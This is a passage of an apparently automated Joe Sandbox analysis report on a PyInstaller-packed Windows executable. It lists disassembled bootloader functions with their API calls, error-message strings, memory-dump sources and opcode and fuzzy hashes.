                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                                                                                        • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                        • Instruction ID: 4b03814a30b0cb6eb511c5bc79a26d75081a068ba495d1804a838b4fd879bc75
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0D1A03290C74186EB20ABA594417BDB7B0FB44798F700135EE4D97B96EF38E998C712
                                                                                                                                                                                                                                        Function 00007FF78DA52C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52C9E
                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52D63
                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF78DA52D99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                        • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                        • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                        • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                        • Instruction ID: f032ea65fe3066be7d1780dba8e08a0c7fac72c363dd072e12fc81f345e5c7c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A31C96370C64142E620BB65B804ABBA6A5BF887D8FA04135DF4D93759FF3CD90AC711
                                                                                                                                                                                                                                        Function 00007FF78DA5DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DDBD
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DDCB
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DDF5
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DE63
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF78DA5DFEA,?,?,?,00007FF78DA5DCDC,?,?,?,00007FF78DA5D8D9), ref: 00007FF78DA5DE6F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                        • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                        • Instruction ID: bd1efbf38f091a8b334d61de394ad97babc63a6ccb8261daaf0b93b224aed0a2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08317221B1E642D5EE12EB52A800975A3A4FF58BA0FF94535ED1D87380FF3CE859C225
                                                                                                                                                                                                                                        Function 00007FF78DA56350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                        • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                        • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                        • Instruction ID: 5c095a7f8edb46826f69add7f882c1d7a06fe95aeb58edee28593bcec0e75bdb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA416021A0C68791EA11FB60E414AE9A335FB54344FF00132EA5D87696FF3CEA19C762
                                                                                                                                                                                                                                        Function 00007FF78DA52A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF78DA5351A,?,00000000,00007FF78DA53F23), ref: 00007FF78DA52AA0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                        • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                        • Instruction ID: ade3b39e6dd314b315222d601eb3a598d108a925060bda253886a5704b20d8e8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF21837261C78192E620AB51B841BE6A3A4FB887C4FA00131FE8D83659EF7CD949C751
                                                                                                                                                                                                                                        Function 00007FF78DA6B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                        • Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                                        • Instruction ID: cbb2f2b9afe6d498539cbfa3b5d5cce628e682acb9baf9ad2e5d582ad36f6b0f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51213C20E0D246C2FA587BB1665193EE1827F547A0FB44634D93E466D6FE2CEC49C323
                                                                                                                                                                                                                                        Function 00007FF78DA77DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                        • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                        • Instruction ID: 932e940a8bc74b9d8366c75af5f151f7cff9069e35c827afdcd25ff647f870ab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3118471B1CA4186E350AB52E854739A2A0FB88BE4F740234DD9D877A4EF3CDD08C751
                                                                                                                                                                                                                                        Function 00007FF78DA58560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF78DA59216), ref: 00007FF78DA58592
                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA585E9
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA59400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF78DA545E4,00000000,00007FF78DA51985), ref: 00007FF78DA59439
                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA58678
                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA586E4
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA586F5
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF78DA59216), ref: 00007FF78DA5870A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                        • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                        • Instruction ID: a4bfb56c5af357d41a21320795b8fefe1448f8cc05c531f7b99d497b9adb3d2c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5641A962B1D68241E630BB61A540AAAA3A4FB44BD4FB40135DF9D97B89FF3CD809C711
                                                                                                                                                                                                                                        Function 00007FF78DA6B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B347
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B37D
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B3AA
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B3BB
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B3CC
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF78DA64F81,?,?,?,?,00007FF78DA6A4FA,?,?,?,?,00007FF78DA671FF), ref: 00007FF78DA6B3E7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                        • Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                                        • Instruction ID: 75ae331f81973749785d7110250b2a3d77656eeac37c8763a39ec9aa3e57d55d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76110B21B0D642C2FA5477A1669193DE1427F54BA0FB54734E92E46BDAFE2CEC09C323
                                                                                                                                                                                                                                        Function 00007FF78DA52910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF78DA51B6A), ref: 00007FF78DA5295E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                        • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                        • Instruction ID: 668c0d01dedc40ac439819db53dc15fc49a226969ffbb4f99fb4b8c00e0ed1ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7531B763B1C68192E710B7A1A8409F6A2A4BF887D4FA04131EE8D83759FF7CD94AC611
                                                                                                                                                                                                                                        Function 00007FF78DA52390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                        • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                        • Instruction ID: 210043caaac010a93c0631d00653b778f0504af554adb9aa90d00b3b86b5eb6d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06317F7261DA8189EB20EB61F8546FAA3A0FF89784FA00135EA4D47B49EF3CC509C711
                                                                                                                                                                                                                                        Function 00007FF78DA52B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF78DA5918F,?,00007FF78DA53C55), ref: 00007FF78DA52BA0
                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF78DA52C2A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                        • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                        • Instruction ID: fe9ac493e18f73684a648176894025a5848d5c0e558efdead6b622f548a13ef8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D621946270CB4181E711AB54B444BEAA364FB88784FA04135EE8D97655EE3CDA09C751
                                                                                                                                                                                                                                        Function 00007FF78DA52710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF78DA51B99), ref: 00007FF78DA52760
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
